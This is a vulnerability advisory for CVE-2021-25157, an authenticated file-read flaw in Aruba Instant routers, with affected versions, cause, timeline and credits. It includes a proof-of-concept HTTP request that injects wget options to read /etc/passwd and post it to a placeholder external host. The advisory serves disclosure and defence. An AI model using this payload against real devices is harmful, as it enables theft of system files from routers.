Authenticated Arbitrary File Read via Web UI (cplogo-install)

Aleph Research Advisory

Identifier

CVE-2021-25157

Severity

Moderate

Product

- Aruba Instant

Vulnerable Version

- Aruba Instant 6.4.x: 6.4.4.8-4.2.4.17 and below - Aruba Instant 6.5.x: 6.5.4.18 and below - Aruba Instant 8.3.x: 8.3.0.14 and below - Aruba Instant 8.5.x: 8.5.0.11 and below - Aruba Instant 8.6.x: 8.6.0.6 and below - Aruba Instant 8.7.x: 8.7.1.0 and below

Technical Details

An authenticated attacker can read arbitrary files from the router and send them to a remote server. The issue is within the handler for the cplogo-install CLI command. The handler for the command will not filter %09(tab) characters from the param, which can cause parameter injection into wget call.

POC:

POST /swarm.cgi HTTP/1.1
Host: IP:4343
.......
.......
Cookie: sid=XXXXXXXXXXXXXXXXXXXX; login=undefined; password=undefined; userType=admin
 
opcode=config&ip=127.0.0.1&cmd='end%20%0Aapply%20cplogo-install%20"http://EXTERNAL-IP/backup.cfg%09--post-file%09/etc/passwd%09#"'&refresh=false&sid=XXXXXXXXXXXXXXXXXXXX&nocache=0.23759201691110987&=&=

Timeline

22-Nov-20
: Reported
03-Feb-21
: CVE-2021-25157 assigned
09-Mar-21
: Patch
09-Mar-21
: Public disclosure

Credit

Gr33nh4t of Aleph Research, HCL Software
waveburst of Aleph Research, HCL Software